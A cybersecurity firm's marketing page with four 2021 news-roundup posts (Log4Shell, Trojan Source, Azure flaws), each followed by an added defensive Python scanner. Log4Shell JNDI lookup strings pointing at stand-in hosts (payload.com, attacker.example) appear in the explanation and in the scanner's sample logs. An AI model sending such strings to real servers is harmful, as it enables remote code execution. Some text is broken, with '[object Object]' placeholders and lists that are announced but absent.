Empowering Clients to the next level of Cybersecurity

A Cybersecurity Partner You Can Trust

We are Strategists, Engineers, Analysts, and Governance Experts embedded in the world’s biggest cyber missions and trusted to advance them.

Our high standards in servicing clients are exemplified through information security, quality and IT service management certifications, both at individual and organisational levels.
Our Services
Managed Detection & Response

CyBourn’s Managed Detection and Response Service maintains seamless integration with our clients’ IT infrastructure and processes. We deliver optimum levels of hardware and software integration, enabling analysts to rapidly detect threats. Our incident handling process ensures that threat mitigation activity commences immediately following identification.

Penetration Testing

Penetration Testing is a method for gaining assurance in the security of an IT system by attempting to breach some or all of that system’s security, using the same tools and techniques as an adversary might. Penetration testing should be viewed as a method for gaining assurance in your organization’s vulnerability assessment and management processes, not as a primary method for identifying vulnerabilities.

Incident Response

Our incident response methodology provides a common framework for our incident responders to work and interact as part of the SOC ecosystem, so that they can react quickly and effectively to threats identified within the infrastructure while coordinating their actions with the monitoring and detection teams and with other incident responders.

Threat Hunting

Our threat hunting methodology provides a common framework for our threat hunters to work and interact as part of the SOC ecosystem, delivering focused, targeted threat detection and continuous improvement of our automated detection and response capabilities.

Cybersecurity Awareness Training

CyBourn builds and executes complex social engineering scenarios to test the awareness levels of internal staff. As the number one entry point for data breaches, phishing techniques are very hard to mitigate. The best way to cope with such threats is to maintain high levels of awareness.


Secure your remote workforce

Implementing effective cybersecurity measures is particularly challenging today because there are more devices than people, attackers are becoming more innovative, and we are facing the fact that there will forever be more remote workers in the new post-pandemic world.

The latest cyber-offensive intelligence to identify and address security risks

Defending against cyber threats requires an in-depth understanding of how attackers operate. Our extensive experience of conducting pen testing, red teaming and other ethical hacking engagements around the world means we have first-hand knowledge of the latest adversarial tactics and wide-ranging insight into how to safeguard against them.

Incorporating your tools

CyBourn delivers ultramodern solutions in consultation with our clients’ IT and risk departments enabling a high degree of scalability and customisation. We can utilise existing client tools, or act as security integrators to recommend and implement open-source, commercial, or off-the-shelf products.

CyBourn takes a unique bespoke approach to developing cybersecurity solutions

We deploy a SOAR (Security Orchestration, Automation, and Response) solution stack to ensure deep visibility, continuous analysis, and rapid response. If an existing product or solution does not offer the level of visibility you need, CyBourn can build custom tools to collect the relevant data.

CyBourn leverages bespoke ML algorithms.

CyBourn leverages machine learning algorithms to build network and user behavioural patterns, detect anomalies accurately, perform in-depth investigations, and act swiftly to contain potential threats, enhance proactive analysis, and map behaviour.

Drive decisions through powerful data

Integrate your essential data and information security indicators to empower your data-driven decision making and response capabilities with Etherlast.

We offer global coverage

Enabled by our global R&D and continuous internal development process, we cover the entire cybersecurity landscape for enterprises across industries, sectors and geographies.

End-to-end solutions

We live the policies, architectures, and intelligence that define cyber enterprises and operations. Our experts have significant experience in offering state-of-the-art monitoring solutions, best-in-class incident response services, and tailored strategic cybersecurity consulting.

What’s trending at CyBourn
The Cybersecurity Express – Issue #4
Blog | 17 DEC, 2021
CyBourn’s very own Cybersecurity Express is once again leaving for fresh and exciting destinations. Hop aboard and journey through the latest news in cybersecurity. As usual, welcome aboard; we are sure that you are eager to see what stops we will be making today. Everything seems to be in order, at first glance at the schedule. However, soon you start noticing something odd: most of the stops are closed for maintenance, all for the same reason. How can it be that so many stations, so far apart, unrelated to each other, each serving its unique purpose, are all affected by the same faulty module? Can one module be so widely used?! Yes, and such is the case with this week’s spotlight program: Log4j and the Log4Shell vulnerability. More like LogFromHell. If a couple of days ago only a few knew about this module, now it’s the talk of the town. That is, if you haven’t been living under a rock. If you have, don’t worry: the Cybersecurity Express will bring you up to speed, with a complete picture of the chaos from the past few days.

Before we get into the mess of it all, let’s dig into a little bit of the background, shall we? Log4j 2 is an open-source, Java-based logging framework commonly incorporated into Apache web servers and Spring Boot web applications, but also used to log events and messages generated by software applications, some of which you might have heard of. By ‘a few’, we really mean an unimaginable number, because we’re talking about:

An extensive list of known vulnerable applications is maintained by the Dutch National Cyber Security Centre in its GitHub repository, and believe me, it is quite a long scroll to get to the bottom. Signs of exploitation attempts and weaponization began to surface ten days before the vulnerability came to light, and since then we have seen attackers deploying cryptocurrency miners, Cobalt Strike drops, ransomware, and botnet recruitment.

“Earliest evidence we’ve found so far of Log4j exploit is 2021-12-01 04:36:50 UTC… However, we don’t see evidence of mass exploitation until after public disclosure,” researchers said. It is impossible to say for certain when this was first exploited, but the danger of JNDI lookups was mentioned in a Black Hat talk all the way back in 2016 and somehow went under the radar; and since the Apache Log4j 2.0-beta9 release was on September 21, 2013, it is possible that a witty actor discovered this soon after.

Dubbed Log4Shell, CVE-2021-44228 has a CVSS score of a “perfect” 10, and that’s as high as they go. That score is due to the widespread use of the program and the relative ease with which the exploit can be applied, allowing remote code execution in Log4j versions 2.0-beta9 up to 2.14.1.

What makes this exploit so easy? JNDI (Java Naming and Directory Interface) and LDAP can be used together by a Java program to locate a Java JNDIObject on an LDAP server operating on the same computer (localhost) on port 389 and read attributes from it using the URL ldap://localhost:389/o=JNDIObject. An attacker can control the LDAP URL by causing Log4j to log a string like ${jndi:ldap://payload.com/a}, resulting in a connection to payload.com to retrieve the object. And, because of how Log4j is built, all it takes to leverage the vulnerability is to send a specially crafted string containing the malicious lookup that gets logged by Log4j version 2.0 or higher. We used LDAP for this example, but it works with LDAP, RMI or DNS.

What are the attackers after? “The bulk of attacks that Microsoft has observed at this time have been related to mass scanning by attackers attempting to thumbprint vulnerable systems, as well as scanning by security companies and researchers,” the Microsoft 365 Defender Threat Intelligence Team said. “Based on the nature of the vulnerability, once the attacker has full access and control of an application, they can perform a myriad of objectives.”

A group of attackers managed to achieve remote code execution (RCE) and download a .NET binary from a remote server that encrypts all the files with the extension “.khonsari” and displays a ransom note urging the victims to make a Bitcoin payment in exchange for recovering access to the files. It’s hard to say what the end goal is here, and it is just as hard to compile a list of IOCs, because hackers are taking a spray-and-pray approach just to wreak havoc. “This vulnerability is extremely bad. Millions of applications use Log4j for logging, and all the attacker needs to do is get the app to log a special string,” security expert Marcus Hutchins tweeted.

The overall scale of this is hard to grasp, but measures like the Cybersecurity and Infrastructure Security Agency (CISA) giving federal agencies an ultimatum to patch systems against the critical vulnerability, and the fact that Ingenuity (NASA’s helicopter mission on Mars) is susceptible to this exploit, kind of put it in perspective. Oh, and by the way, this last-mentioned fact makes this the first interplanetary exploit… probably. Despite that, researchers have been hard at work compiling lists of checks, GitHub repositories, and tools you can use to see if you are vulnerable, apply workarounds to mitigate the attack or find traces of exploitation.

What can you do? If your organization uses the log4j library, upgrade to log4j-2.16.0 immediately. You should also be sure that your Java instance is updated. From Log4j 2.15.0 on, this behavior has been disabled by default. To make things worse, the release of the patched version came with news of another vulnerability, CVE-2021-45046, revealing that the module is also prone to a denial of service attack, which attackers are now also exploiting. Also, consult the Git repositories to see what helps, check the list of affected vendors and apply the latest patches particular to each software, should they be released. If, for any reason, you are unable to update, you could:

As this ride onboard the Cybersecurity Express draws to an end, you feel relieved and are now better prepared to face the Log4Shell exploit. This is indeed a subject worthy of the entire attention it’s getting. We bid you goodbye and humbly await your return onboard.
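Two defender-side checks for the Log4Shell write-up above, added here as an example rather than CyBourn’s own code or tooling: a version-range test for the affected Log4j releases the post names (2.0-beta9 up to 2.14.1), and a scanner that flags ${jndi:...} lookups in log lines and extracts the scheme and host they would contact, so the host can be blocklisted and the source triaged. Function names, sample log lines and hostnames are constructed.

```python
"""Added example (not CyBourn's code, not from the post): two defender-side
triage helpers for the Log4Shell write-up.
  - is_vulnerable_version(): is a Log4j 2 version inside the affected range
    2.0-beta9 .. 2.14.1 that the post names?
  - scan_log_lines(): flag log lines carrying a ${jndi:...} lookup and pull
    out the scheme (ldap/rmi/dns, as in the post) and host it would contact.
All log lines and hostnames below are constructed samples.
"""
import re
from typing import List, Optional, Tuple

# ${jndi:<scheme>:<//>host[:port]/...}  -- scheme limited to the three the post names.
JNDI_RE = re.compile(
    r"\$\{jndi:(ldap|rmi|dns):/*([^/}:\s]+)(?::(\d+))?[^}]*\}", re.IGNORECASE
)

VERSION_RE = re.compile(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-(alpha|beta|rc)(\d+))?")


def parse_version(v: str) -> Tuple[int, int, int, Tuple[int, int]]:
    """Turn '2.0-beta9' or '2.14.1' into a tuple that sorts correctly.
    A pre-release (alpha < beta < rc) sorts below the final release of the
    same number, which is what the range check needs for 2.0-beta9."""
    m = VERSION_RE.fullmatch(v.strip())
    if not m:
        raise ValueError(f"unrecognised Log4j version: {v!r}")
    major, minor, patch = int(m[1]), int(m[2]), int(m[3] or 0)
    if m[4]:
        pre = ({"alpha": 0, "beta": 1, "rc": 2}[m[4]], int(m[5]))
    else:
        pre = (9, 0)  # final release: above any pre-release tag
    return (major, minor, patch, pre)


VULN_LOW = parse_version("2.0-beta9")
VULN_HIGH = parse_version("2.14.1")


def is_vulnerable_version(v: str) -> bool:
    """True when the version is within the CVE-2021-44228 range given in the post."""
    return VULN_LOW <= parse_version(v) <= VULN_HIGH


def scan_log_lines(lines: List[str]) -> List[Tuple[int, str, str, Optional[int]]]:
    """One finding per JNDI lookup found: (line_no, scheme, host, port)."""
    findings = []
    for n, line in enumerate(lines, 1):
        for m in JNDI_RE.finditer(line):
            findings.append((n, m[1].lower(), m[2], int(m[3]) if m[3] else None))
    return findings


# Constructed sample log lines: a benign request, then lookups placed in a
# User-Agent, a username field and an X-Forwarded-For header.
SAMPLE_LOG = [
    '10.0.0.7 - - "GET / HTTP/1.1" 200 ua="Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 ua="${jndi:ldap://attacker.example/a}"',
    "login failed for user ${jndi:rmi://198.51.100.4:1099/x}",
    "healthcheck ok",
    "x-forwarded-for: ${jndi:dns:/canary.example/probe}",
]

if __name__ == "__main__":
    for v in ("2.0-beta9", "2.14.1", "2.15.0", "2.16.0"):
        print(f"log4j {v:9} vulnerable={is_vulnerable_version(v)}")
    for line_no, scheme, host, port in scan_log_lines(SAMPLE_LOG):
        suffix = f":{port}" if port else ""
        print(f"line {line_no}: {scheme} lookup -> {host}{suffix}")
```

The version check implements exactly the range the post states; it does not know about later back-ported fix releases, so treat its result as a first-pass triage rather than a final verdict.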
The Cybersecurity Express – Issue #3
Blog | 2 NOV, 2021
You just got your ticket, and you look at your watch: ugh, you’re late. Your fist tightens its grip on your briefcase as you start running towards the platform. A powerful whistle can be heard as the engine cranks the wheels into motion. You make a dash, grab hold of the rail, and hoist yourself up through the wagon door. You made it on board the Cybersecurity Express! In front of you, the schedule reads: ‘Trojan Source’, can this be your new nightmare? SQUIRRELWAFFLE, phishing is back, and it’s used to gain access to enterprise networks. Followed by a flaw in macOS found by Microsoft and a new Windows LPE zero-day vulnerability, among others.

‘Trojan Source’, the Stuff of Nightmares

Cambridge University researchers Nicholas Boucher and Ross Anderson published a paper stating that all compilers are susceptible to malicious code injection by threat actors that goes undetected. The researchers said that “the attack exploits subtleties in text-encoding standards such as [object Object] to produce source code whose tokens are logically encoded in a different order from the one in which they are displayed, leading to vulnerabilities that cannot be perceived directly by human code reviewers”. Spotlighted as CVE-2021-42574 and CVE-2021-42694, they affect compilers of all popular programming languages such as C, C++, C#, JavaScript, Java, Rust, Go, and Python. This issue takes advantage of Unicode’s bidirectional algorithm, which enables support for both left-to-right (English) and right-to-left (Arabic) languages. These, however, can be used interchangeably within the same code and allow writing left-to-right words inside a right-to-left sentence, or vice versa, thus allowing software vulnerabilities to be injected in a practically invisible manner, further trickling down the supply chain. Unfortunately, this is not something that one entity can fix; it will have to be eradicated with a joint industry effort.

Squirrelwaffle, from Spam Campaign to Infection

Researchers uncovered a malspam campaign used to deliver malicious Microsoft Office documents that set the stage for later infection and are “used to facilitate the delivery of additional malware such as [object Object] and [object Object], two of the most common threats regularly observed targeting organizations around the world”. In mid-September 2021, Talos engineers observed campaigns that tricked users into opening malicious payloads by leveraging stolen email threads, making them appear to be replies to existing emails; these typically contained hyperlinks to malicious ZIP archives. Interestingly, some sort of dynamic localization is used, as the malicious emails are in the same language as detected in the thread to which they respond, making them more convincing. As it is with social engineering, there is no better protection than a well-informed employee, so make sure you and your colleagues attend those cybersecurity briefings.

macOS Vulnerability Found by … Microsoft?!

In stranger news, it seems it’s more lucrative to find vulnerabilities in someone else’s back yard rather than in your own. The flaw, dubbed ‘Shrootless’, is already accounted for as CVE-2021-30892 and fixed in macOS Monterey 12.0.1. This vulnerability allows attackers to bypass System Integrity Protection (SIP) and perform malicious activities, like gaining root privileges and installing rootkits on the device. System Integrity Protection, also referred to as rootless, is a macOS security feature introduced in OS X El Capitan in 2015 that restricts a root user from performing operations that may compromise system integrity. Only processes signed by Apple are allowed to modify those protected parts of the OS. “While assessing macOS processes entitled to bypass SIP protections, we came across the daemon system_installd, which has the powerful com.apple.rootless.install.inheritable entitlement. With this entitlement, any child process of system_installd would be able to bypass SIP filesystem restrictions altogether,” said Microsoft. Microsoft even made a proof-of-concept (PoC) exploit to override the kernel extension exclusion list:

LPE Zero-day Vulnerability in Windows

While Microsoft is busy finding vulnerabilities in other vendors’ software, researchers are finding vulnerabilities in Windows; it’s only fair. Back in August, Microsoft patched the “Windows User Profile Service Elevation of Privilege Vulnerability”, CVE-2021-34484. After examining the fix, researchers were able to bypass it with a new exploit that was published on GitHub, claiming that Microsoft only fixed what was the result of the PoC but didn’t handle the underlying issue. This exploit causes an elevated command prompt with SYSTEM privileges to be launched while the User Account Control (UAC) prompt is displayed. The severity of this bug is downplayed by the fact that the attacker must already have two user credentials to be able to pull this off.

We have arrived back at the station and in conclusion…

What exciting stops we have had today, but everything must draw to an end; the train must head back to refuel for new and exciting destinations, but not before visiting a few noteworthy events in the world of cybersecurity:

We hope you enjoyed traveling onboard the Cybersecurity Express and we await your return. Until next time, stay safe!
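A pre-commit style scanner for the ‘Trojan Source’ issue covered in this issue, added here as an example (not the Cambridge paper’s tooling or CyBourn’s code): it reports the Unicode bidirectional control characters that editors render invisibly and that source code almost never needs, and re-renders a line with them made visible for review. The sample source text and function names are constructed.

```python
"""Added example (not the Cambridge paper's tooling, not CyBourn's code): a
small pre-commit style scanner for the 'Trojan Source' issue. It reports the
Unicode bidirectional override/isolate/mark controls hidden in source text
and can re-render a line with those characters made visible.
The sample source text is constructed.
"""
from typing import List, Tuple

# Bidi controls from the Unicode standard: explicit embeddings/overrides
# (U+202A..U+202E), isolates (U+2066..U+2069) and the two directional marks.
BIDI_CONTROLS = {
    "\u202a": "LRE", "\u202b": "RLE", "\u202c": "PDF", "\u202d": "LRO", "\u202e": "RLO",
    "\u2066": "LRI", "\u2067": "RLI", "\u2068": "FSI", "\u2069": "PDI",
    "\u200e": "LRM", "\u200f": "RLM",
}


def find_bidi_controls(text: str) -> List[Tuple[int, int, str]]:
    """Return (line, column, name), both 1-based, for every bidi control found."""
    hits = []
    for ln, line in enumerate(text.splitlines(), 1):
        for col, ch in enumerate(line, 1):
            if ch in BIDI_CONTROLS:
                hits.append((ln, col, BIDI_CONTROLS[ch]))
    return hits


def render_visible(line: str) -> str:
    """Replace each bidi control with a <NAME> tag so the logical order the
    compiler sees can be read by a human reviewer."""
    return "".join(f"<{BIDI_CONTROLS[c]}>" if c in BIDI_CONTROLS else c for c in line)


def check_source(text: str) -> bool:
    """Gate for a pre-commit hook: True when the text is free of bidi controls."""
    return not find_bidi_controls(text)


# Constructed sample: an RLO (U+202E) and an LRI (U+2066) hidden inside a comment.
SAMPLE_SOURCE = (
    "def is_admin(user):\n"
    "    # the next line carries two invisible bidi controls\n"
    "    return True  # \u202e hidden \u2066\n"
)

if __name__ == "__main__":
    for ln, col, name in find_bidi_controls(SAMPLE_SOURCE):
        print(f"line {ln}, col {col}: {name}")
    print(render_visible(SAMPLE_SOURCE.splitlines()[2]))
    print("clean:", check_source(SAMPLE_SOURCE))
```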
The Cybersecurity Express – Issue #2
Blog | 29 SEP, 2021
You made it just in time for the second departure of the Cybersecurity Express. The whistle blows, the wheels start spinning, and thus the journey begins! Today we will make a stop at “Dark Basin”, a massive hack-for-hire operation uncovered by Citizen Lab, a scandal on which CyBourn’s very own CEO, Ashwin Jayaram, was interviewed by the New York Times. Our second stop is an Azure Active Directory flaw that allows for unlimited password guessing. Lastly, a brand-new way malware can use to escape detection on Windows.

Dark Basin – “You desire, we do”

That literally is their slogan: “You desire, we do”. An Indian company, BellTroX InfoTech, has been linked with a massive hack-for-hire operation uncovered by Citizen Lab. Talking about hiding in plain sight… Dark Basin is a hack-for-hire group that has targeted countless individuals and institutions. Targets include advocacy groups and journalists, elected and senior government officials, hedge funds, and multiple industries, many of them organizations working on a campaign called #ExxonKnew, which claims that ExxonMobil hid information about its impact on climate change for decades.

“The lawsuit filed last month in Federal Court in North Carolina, by an Iranian aviation executive, Farhad Azima, alarmingly alleges collaboration between a web of international law firms, private investigators and hackers in India, claiming that such tangled relationships are common in hacking for hire schemes, so that intermediaries can be used to obfuscate who may be ultimately responsible for a hacking attempt and make it difficult for investigators to peel back the layers to the ultimate source. Hacking for hire schemes clearly fall foul of section 43 of the IT Act and shall constitute “unauthorised access”. What action is taken legally against such activities mushrooming in India could actually determine if the country’s famous IT sector retains its global reputation or gets a bad name,” says Salman Waris, Partner at TechLegis.

Through tedious collaboration with dozens of targeted organizations and individuals, using a mix of open-source intelligence, investigations and some good old journalism, Citizen Lab was able to link Dark Basin’s activity, with high confidence, to individuals working at an Indian company named BellTroX InfoTech Services (and possibly other names). It seems that BellTroX’s director, Sumit Gupta, despite being indicted in California in 2015 for his role in a similar hack-for-hire scheme, is still in this dirty business. The investigation revealed a combination of timestamps in UTC+5:30 (India time zone), URL shorteners and copies of a phishing kit source code available openly online that all pointed to BellTroX involvement. Not to mention that some employees utilized personal information as bait content when testing their URL shorteners, information also left publicly available. Don’t be so quick to think this is sloppy work, because they also made social media posts taking credit for attack techniques, containing screenshots of links to Dark Basin, so they were mostly bragging about their endeavors, probably to gain notoriety in that “line of work”. Organizations such as the Rockefeller Family Fund, Greenpeace, the Center for International Environmental Law and the Union of Concerned Scientists (just to name a few) gave consent to be publicly disclosed as targets of the attackers. Many other companies prefer to remain anonymous. The perpetrators went so far as to make websites that look identical to popular online web services such as Google Mail, Yahoo Mail, Facebook, and others. If you are an organization fighting against big oil moguls, or share any common goals with the organizations targeted, it’s best you use the IOCs released by Citizen Lab on GitHub to check if you were/are a target of the malicious group. Some of the useful information on GitHub includes:

Azure Active Directory password bug

Researchers gave word of a recently discovered flaw in the protocol used by the Azure Active Directory Seamless Single Sign-On service that allows for continuous brute-force of an AD user’s credentials. If “That sounds impossible!” is what you are thinking, it’s because these attempts aren’t logged on the server. Usual anti-brute-force mechanisms rely on logs and specific error codes. “This flaw allows threat actors to perform single-factor brute-force attacks against Azure Active Directory without generating sign-in events in the targeted organization’s tenant,” explain the researchers. Seamless SSO allows users access to Azure AD without the need for credential input if they are on the corporate network. “This feature provides your users easy access to your cloud-based applications without needing any additional on-premises components,” explains Microsoft. Here’s a short version of how the Seamless SSO mechanism is vulnerable:

These authentication steps of Autologon to Azure AD are not logged, thus allowing threat actors to utilize the usernamemixed endpoint for undetected brute-force. Microsoft is considering this a “design choice”, not a vulnerability, and it’s unclear if the flaw will be fixed. Until then, organizations are at risk of sneaky brute-force attacks. Maybe we need to use passwords longer than the cybersecurity train?!

Undetectable Malware on Windows

Google cybersecurity researchers revealed a new technique adopted by threat actors to conceal malicious payloads using malformed digital signatures. The usual technique involves using illegally obtained digital certificates to sneak adware and other unwanted software past malware detection tools, by masquerading as legitimate software or by embedding the attack code into legitimate digitally signed software components. This new technique stands out for its intentional use of malformed signatures to give defenses the old slip. This was observed with a known family of adware called OpenSUpdater, where most of the targets of the campaign are users who are prone to downloading cracked versions of games and other grey-area software. “Attackers created malformed code signatures that are treated as valid by Windows but are not able to be decoded or checked by OpenSSL code – which is used in a number of security scanning products,” said Google Threat Analysis Group’s Neel Mehta. “This is the first time TAG has observed actors using this technique to evade detection while preserving a valid digital signature on PE files”. The artifacts are signed with an invalid leaf X.509 certificate that’s edited in such a manner that the ‘parameters’ element of the SignatureAlgorithm field included an End-of-Content (EOC) marker instead of a NULL tag. Some antivirus engines were able to detect the malware, Windows Defender being one of them. Other reputable antivirus companies need to implement changes so that their software also detects this kind of threat.

As the Cybersecurity Express starts heading back to the depot, we still catch a glimpse of this subject: “No fewer than 11 vulnerabilities disclosed in Nagios network management systems allow attackers remote code execution with the highest privileges, and more! Make sure to keep exploits at bay with updates to Nagios XI 5.8.5 or above, Nagios XI Switch Wizard 2.5.7 or above, Nagios XI Docker Wizard 1.13 or above and Nagios XI WatchGuard 1.4.8 or above.”

For updates like this, posted within 24 hours of their disclosure, make sure to follow CyBourn on LinkedIn and Twitter. Hope to see you onboard again soon.
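A minimal DER check for the malformed-signature trick described under “Undetectable Malware on Windows” above, added as an example (not Google TAG’s detection logic or CyBourn’s code): it parses an X.509 AlgorithmIdentifier and reports whether its parameters are the ASN.1 NULL a well-formed signature carries or an End-of-Content marker in its place, which is what a scanner should refuse to treat as valid. The two AlgorithmIdentifier byte strings are constructed by hand for sha256WithRSAEncryption, not taken from real samples.

```python
"""Added example (not Google TAG's detection logic, not CyBourn's code): a
minimal DER check for the malformed-signature trick, where the 'parameters'
of an AlgorithmIdentifier carry an End-of-Content marker (bytes 00 00)
instead of the ASN.1 NULL (05 00) a well-formed signature uses. A scanner
that accepts only 'null' (or 'absent') here rejects that class of file.
The two AlgorithmIdentifier byte strings are constructed by hand for
sha256WithRSAEncryption; they are not taken from real OpenSUpdater samples.
"""
from typing import Tuple


def read_tlv(buf: bytes, pos: int) -> Tuple[int, bytes, int]:
    """Parse one DER tag-length-value at pos; returns (tag, value, next_pos).
    Handles short-form and long-form lengths; rejects truncated input."""
    if pos + 2 > len(buf):
        raise ValueError("truncated TLV header")
    tag, length, hdr = buf[pos], buf[pos + 1], 2
    if length & 0x80:  # long form: the next N bytes hold the length
        n = length & 0x7F
        length = int.from_bytes(buf[pos + 2:pos + 2 + n], "big")
        hdr += n
    start = pos + hdr
    if start + length > len(buf):
        raise ValueError("truncated TLV value")
    return tag, buf[start:start + length], start + length


def decode_oid(raw: bytes) -> str:
    """Decode the contents of a DER OBJECT IDENTIFIER into dotted form."""
    arcs = [raw[0] // 40, raw[0] % 40]
    val = 0
    for b in raw[1:]:
        val = (val << 7) | (b & 0x7F)
        if not b & 0x80:  # high bit clear ends a base-128 arc
            arcs.append(val)
            val = 0
    return ".".join(map(str, arcs))


def check_algorithm_identifier(der: bytes) -> Tuple[str, str]:
    """Return (algorithm OID, parameters status) where status is one of
    'null' (well-formed), 'absent', 'eoc' (the malformed marker) or 'other'."""
    tag, seq, _ = read_tlv(der, 0)
    if tag != 0x30:
        raise ValueError("AlgorithmIdentifier must be a SEQUENCE")
    oid_tag, oid_raw, pos = read_tlv(seq, 0)
    if oid_tag != 0x06:
        raise ValueError("first element must be an OBJECT IDENTIFIER")
    oid = decode_oid(oid_raw)
    if pos >= len(seq):
        return oid, "absent"
    ptag, pval, _ = read_tlv(seq, pos)
    if ptag == 0x05 and pval == b"":
        return oid, "null"
    if ptag == 0x00 and pval == b"":  # EOC marker sitting where NULL belongs
        return oid, "eoc"
    return oid, "other"


# Constructed: OID 1.2.840.113549.1.1.11 (sha256WithRSAEncryption) followed
# by either a proper NULL or the EOC marker described in the post.
OID_TLV = bytes.fromhex("06092a864886f70d01010b")
GOOD_ALGID = bytes([0x30, 0x0D]) + OID_TLV + bytes([0x05, 0x00])       # NULL
MALFORMED_ALGID = bytes([0x30, 0x0D]) + OID_TLV + bytes([0x00, 0x00])  # EOC

if __name__ == "__main__":
    for label, blob in (("well-formed", GOOD_ALGID), ("malformed", MALFORMED_ALGID)):
        print(label, check_algorithm_identifier(blob))
```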
The Cybersecurity Express
News | 16 SEP, 2021
CyBourn is launching the Cybersecurity Express, bringing you trending subjects in sizeable chunks! Hop aboard and let us take you on a journey through what’s happened during the past days in the thrilling world of cybersecurity. Mind the gap and keep your limbs and heads inside the vehicle at all times, because we are passing at high speed through attacks, zero-day vulnerabilities and exciting news. We are now arriving at our first destination:

Microsoft Releases patch for Office 365 zero-day attacks

You may be familiar with the Microsoft-disclosed vulnerability CVE-2021-40444, in which Windows Server 2008 through 2019 and Windows 8.1 through 10 systems are susceptible to attack via a malicious ActiveX control used by a Microsoft Office document that hosts the MSHTML browser rendering engine. A patch was released on September 14th, this mitigation method being advised above all other workarounds proposed by specialists so far: having “protected mode” on, modifying registry keys, etc. The Windows updates are a must, after the mitigations proposed by Microsoft were bypassed successfully and the attack was carried out even with files that have no MoTW (Mark of the Web) flag, for which “protected mode” does not apply. We can only hope this patch puts an end to the ActiveX nightmare for good and eliminates all other bypass possibilities. See the vulnerability’s official page, “Security Updates” section, for more information on the cumulative updates, which also address 60 other vulnerabilities (86 including Microsoft Edge), fixing one bonus unexploited zero-day: CVE-2021-36968 – Windows DNS Elevation of Privilege Vulnerability.

Microsoft Azure’s “OMIGOD” and “ChaosDB” vulnerabilities

“OMIGOD” impacts Azure Linux virtual machines that use the Open Management Infrastructure (OMI). This utility is intended to function similarly to the Windows WMI service, allowing for collection of logs and remote management commands. OMI is built to require authentication, binding commands to a user ID, but a bug allows malformed requests to skip the authentication phase and be interpreted as coming from root. Even worse, the tool can be configured for remote management, running an HTTPS server on port 5986 which can be connected to with a standard HTTPS client like curl and which receives XML-derived SOAP protocol commands. A compromised system will allow the attacker to run arbitrary commands as root using OMI syntax. Moreover, if OMI is configured to listen on a network port, the attacker can use that to get control of other virtual machines on the same network. CVEs issued tied to this OMI utility exploit:

Not all hope is lost: to mitigate this threat you can use your platform’s package tool to upgrade OMI, with commands such as “sudo apt-get install omi”, to the latest version, v1.6.8-1, of the software. You can first check to see if you are vulnerable by connecting to your Azure VMs and running the commands below to see the OMI version installed:

In the cases where OMI listens on TCP ports, limiting access to these ports via the Linux firewall is advised. A global firewall deny rule, with allow rules only for the specific machines that need to access a given service, is always a good measure.

“ChaosDB”

This may be old news, as it was reported to Microsoft back in August, but it still poses a major threat, because any Cosmos DB account that had Jupyter Notebook enabled could be compromised. Microsoft security teams took immediate action to disable the notebook service right after the critical vulnerability was reported to them. Remediated or not, users are still required to perform mitigation steps due to the risk that their Cosmos DB primary keys were obtained by malicious actors. Using a chain of vulnerabilities in the Jupyter Notebook feature of Cosmos DB, an attacker can query information about the target, obtaining a set of credentials that can be used to view, modify, and delete data in the Cosmos DB account. Follow this Microsoft guide to regenerate your Cosmos DB Primary Key, should this mitigation be applicable in your organization.

Approaching our final stop: ‘Azurescape’, a first Kubernetes container escape

Microsoft keeps making the headlines, with yet another critical vulnerability discovered, “the first cross-account container takeover in the public cloud”, researchers say. A malicious Azure actor could compromise the multitenant Kubernetes clusters hosting ACI, establishing full control over other users’ containers, enabling them to steal customer secrets and images deployed to the platform, and possibly abuse ACI’s infrastructure for cryptomining. By deploying a WhoC to ACI, researchers managed to read the container runtime and were shocked to find runc version v1.0.0-rc2, released way back in October 2016, known to be vulnerable to at least two container breakout CVEs. All that was left was to modify a PoC container image and deploy it to ACI to get a reverse shell running as root on the Kubernetes node. Once there, they monitored the traffic on Kubelet port 10250 for a request that includes a JWT token in the authorization header. They used az container exec to run a command on the uploaded container, resulting in the bridge pod sending an exec request to the Kubelet on the compromised node. Finally, back on the node, they extracted the bridge token from the request’s authorization header and used it to pop a shell on the api-server. Voilà! Consequently, Microsoft released a patch to ACI. The bridge pod no longer sends its service account token to nodes when issuing exec requests, preventing the reported cross-tenant attack. Also, the bridge now verifies that a pod’s status.hostIP field is a valid IP before sending an exec request. It’s been a rough month for Microsoft, but this is the way of the digital world today.

Before we end, here are some mention-worthy events:

Thank you for riding on the Cybersecurity Express; please don’t forget to take your personal belongings and stay safe by installing updates and patches regularly. Thank you for hitching a ride on the CyBourn Cybersecurity Express. Hope to have you on board for our next departure, soon!

Tell us about your Cybersecurity needs

We are strategists, engineers, analysts, and governance experts embedded in the world’s biggest cyber missions and trusted to advance them. Let us help you today.